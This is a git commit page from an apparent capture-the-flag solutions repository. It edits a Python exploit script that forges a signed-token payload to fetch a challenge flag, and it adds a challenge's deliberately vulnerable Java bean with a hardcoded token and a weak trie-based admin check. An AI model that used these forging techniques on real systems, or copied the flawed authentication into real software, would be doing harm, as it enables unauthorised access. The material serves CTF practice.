Browse Source

Day 13 started

Roman Hergenreder 4 years ago
parent
commit
f36aa42aa9
2 changed files with 66 additions and 5 deletions
  1. 7 5
      Day 11/exploit.py
  2. 59 0
      Day 13/NotesBean.java

+ 7 - 5
Day 11/exploit.py

@@ -20,14 +20,15 @@ def registerUser():
             return
 
         print("Server returned %d %s" % (res.status_code, res.reason))
-        print(res.text)
+        print(data)
         exit(1)
 
 def getFlag():
     payload = {
       "user": {
-        "username": USERNAME,
-        "platinum": True
+        "username": "Santa",
+        "password": PASSWORD,
+        "platinum": False
       },
       "exp": time.time() + 60*60
     }
@@ -42,5 +43,6 @@ def getFlag():
     data = res.text
     print(json.loads(data)["joke"])
 
-registerUser()
-getFlag()
+if __name__ == "__main__":
+    registerUser()
+    getFlag()

+ 59 - 0
Day 13/NotesBean.java

@@ -0,0 +1,59 @@
+package com.jwt.jsf.bean;
+import org.apache.commons.collections4.trie.PatriciaTrie;
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.Serializable;
+import java.io.StringWriter;
+
+import javax.faces.bean.ManagedBean;
+import javax.faces.bean.SessionScoped;
+import static org.apache.commons.lang3.StringEscapeUtils.unescapeJava;
+import org.apache.commons.io.IOUtils;
+
+@ManagedBean(name="notesBean")
+@SessionScoped
+public class NotesBean implements Serializable {
+
+	/**
+	 *
+	 */
+	private PatriciaTrie<Integer> trie = init();
+	private static final long serialVersionUID = 1L;
+	private static final String securitytoken = "auth_token_4835989";
+
+	public NotesBean() {
+	    super();
+	    init();
+	}
+
+	public String getTrie() throws IOException {
+		if(isAdmin(trie)) {
+			InputStream in=getStreamFromResourcesFolder("data/flag.txt");
+			StringWriter writer = new StringWriter();
+			IOUtils.copy(in, writer, "UTF-8");
+			String flag = writer.toString();
+
+			return flag;
+		}
+		return "INTRUSION WILL BE REPORTED!";
+	}
+
+	public void setTrie(String note) {
+		trie.put(unescapeJava(note), 0);
+	}
+
+  private static PatriciaTrie<Integer> init(){
+    PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
+    trie.put(securitytoken,0);
+    return trie;
+  }
+
+  private static boolean isAdmin(PatriciaTrie<Integer> trie){
+    return !trie.containsKey(securitytoken);
+  }
+
+  private static InputStream getStreamFromResourcesFolder(String filePath) {
+  	return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
+  }
+}